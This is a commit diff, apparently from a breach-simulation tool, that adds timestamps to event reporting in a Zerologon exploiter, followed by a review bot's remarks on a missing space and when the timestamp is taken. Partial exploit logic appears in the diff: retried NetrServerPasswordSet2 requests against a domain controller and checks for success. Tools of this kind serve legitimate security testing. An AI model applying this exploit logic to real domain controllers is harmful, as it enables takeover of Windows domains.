Agent: Add timestamps to publish calls

This commit is contained in:
Kekoa Kaaikala 2022-10-07 20:27:14 +00:00
parent 8eb3c94a94
commit 88d2bf7140
1 changed files with 14 additions and 17 deletions


@ -187,19 +187,20 @@ class ZerologonExploiter(HostExploiter):
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
if is_exploited:
return True
return False
def try_exploit_attempt(self, rpc_con) -> Optional[object]:
def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
error_message = ""
timestamp = time()
try:
exploit_attempt_result = self.attempt_exploit(rpc_con)
return exploit_attempt_result
return exploit_attempt_result, timestamp
except nrpc.DCERPCSessionError as err:
# Failure should be due to a STATUS_ACCESS_DENIED error.
# Otherwise, the attack is probably not working.
@ -210,12 +211,9 @@ class ZerologonExploiter(HostExploiter):
error_message = f"Unexpected error: {err}"
logger.info(error_message)
self._publish_exploitation_event(
success=False,
error_message=error_message,
)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return None
return None, timestamp
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
request = nrpc.NetrServerPasswordSet2()
@ -236,25 +234,24 @@ class ZerologonExploiter(HostExploiter):
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
request["Authenticator"] = authenticator
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool:
def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
if exploit_attempt_result:
if exploit_attempt_result["ErrorCode"] == 0:
self.report_login_attempt(result=True, user=self.dc_name)
_exploited = True
logger.info("Exploit complete!")
self._publish_exploitation_event(success=True)
self._publish_exploitation_event(timestamp, True)
else:
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
error_message = f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
error_message = (
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
"Something went wrong."
)
logger.info(error_message)
self._publish_exploitation_event(
success=False,
error_message=error_message,
)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return _exploited
return False
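Review bot: The two adjacent string literals in the `error_message` assignment in `assess_exploit_attempt_result` are implicitly concatenated with no separator, so the published failure message reads `Non-zero return code: 5.Something went wrong.`; add a trailing space to the first literal, `f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. "`. Separately, the timestamp handed to `_publish_exploitation_event` is taken at the top of `try_exploit_attempt` (`timestamp = time()`) before `attempt_exploit` issues the RPC, so every event is stamped with the start of the attempt rather than the moment its outcome was observed; that is a defensible choice for correlating with the domain controller's own Netlogon logs, but it should be stated in the method's docstring, e.g. `The timestamp is captured before the RPC call, so the event marks when the attempt began, not when the response arrived.` No import hunk is shown in this commit, so `time` and `Tuple` are presumably already in scope in the module. `try_exploit_attempt` spans the first two hunks.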